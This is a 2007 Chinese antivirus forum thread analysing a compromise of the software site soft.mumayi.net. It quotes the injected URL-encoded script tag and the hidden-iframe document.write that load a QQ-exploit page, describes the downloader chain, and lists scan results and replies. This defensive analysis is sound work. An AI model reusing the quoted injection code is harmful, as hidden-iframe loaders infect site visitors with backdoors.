查看: 4613|回复: 9
收起左侧

[病毒样本] 木蚂蚁软件站被挂的利用QQ最新漏洞的木马及其下载的病毒

[复制链接]
dikex
发表于 2007-1-6 23:35:06 | 显示全部楼层 |阅读模式
<script language="javascript" src="http://%77%77%77%2E%61%75%64%6C%65%79%63%68%69%6E%61%2E%63%6F%6D/bbs1/Dv_plus/Tools/mm.js"></script>
木蚂蚁软件站(soft.mumayi.net)的源文件里面的一句,就是这个了(http://www.audleychina.com/bbs1/Dv_plus/Tools/mm.js)
里面的内容:
document.write("<iframe width='0' height='0' src='http://%77%77%77%2E%61%75%64%6C%65%79%63%68%69%6E%61%2E%63%6F%6D/bbs1/Dv_plus/Tools/dhxz.htm'></iframe>");
调用了这个利用QQ最新漏洞的网马http://www.audleychina.com/bbs1/Dv_plus/Tools/dhxz.htm

dhxz.htm为有毒页面,利用QQ的最新漏洞(漏洞的文章http://dswlab.com/vir/v20070103.html
),打开后会下载dhxz.exe,之后dhxz.exe把自身复制到system32目录下(文件名为~.exe),之后会下载并运行csgss.exe,然后在C盘生成D.bat,运行D.bat后把D.bat和~.exe删除。

不过csgss.exe在虚拟机运行时出错,所以没有作进一步的测试,多引擎扫描的结果
AntiVir 7.3.0.21 01.05.2007 HEUR/Malware
Authentium 4.93.8 12.30.2006 could be a corrupted executable file
Avast 4.7.892.0 12.30.2006 Win32:Hupigon-FB
BitDefender 7.2 01.06.2007 BehavesLike:Win32.ExplorerHijack
Ewido 4.0 01.06.2007 Backdoor.Hupigon.dkl
Fortinet 2.82.0.0 01.06.2007 suspicious
Ikarus T3.1.0.27 01.06.2007 Backdoor.Win32.Hupigon.u
NOD32v2 1959 01.05.2007 probably unknown NewHeur_PE virus
Panda 9.0.0.4 01.06.2007 Suspicious file
Sunbelt 2.2.907.0 01.05.2007 VIPRE.Suspicious
VBA32 3.11.1 01.06.2007 suspected of Backdoor.Delf.78


最后是样本,无密码

[ 本帖最后由 ALEXBLAIR 于 2007-1-8 18:59 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +2 收起 理由
navigateqd + 2 感谢提供警示

查看全部评分

jackyma
发表于 2007-1-6 23:41:39 | 显示全部楼层
nod32报了!未知的,上报了!哈哈
小邪邪
发表于 2007-1-6 23:48:07 | 显示全部楼层
木蚂蚁又被挂毒了?我看一下先
小邪邪
发表于 2007-1-6 23:50:26 | 显示全部楼层
mcafee8.5i报了个JS
kbsj1234
发表于 2007-1-7 01:46:06 | 显示全部楼层
被AVAST中止了连线,呵呵!
绅博周幸
发表于 2007-1-7 08:41:06 | 显示全部楼层
卡巴全部杀光,娃哈哈
jimmyleo
发表于 2007-1-7 09:40:51 | 显示全部楼层
Hello.

New malicious software was found in the attached file.

It's detection will be included in the next update. Thank you for your help.

-----------------

Regards, Yury Nesmachny

Virus Analyst, Kaspersky Lab.

> Attachment: qq.zip




上报了 咔吧可杀
hsjj2005
发表于 2007-1-7 09:58:51 | 显示全部楼层
dikex 大侠的东东就是好啊!有分析又有样本。可惜咱费尔托斯特查不出
nicaries
发表于 2007-1-7 11:47:08 | 显示全部楼层
F-SECURE没查出来
AVG查出四个
dikex
 楼主| 发表于 2007-1-7 12:09:57 | 显示全部楼层
大侠不敢当,这些分析的技术含量都不高,用来骗骗贴不错

我发现病毒访问了这个txt文件 http://www.routeronline.cn/sxip2007.txt
里面的内容为:http://98exe61.141.136.159:1861edd

这个貌似地址的东西语法上有问题,直接是打不开的……
61.141.136.159应该是IP,而1861是端口,但其他的那些就不知道是什么来的
疑惑ing……
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 13:44 , Processed in 0.136055 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表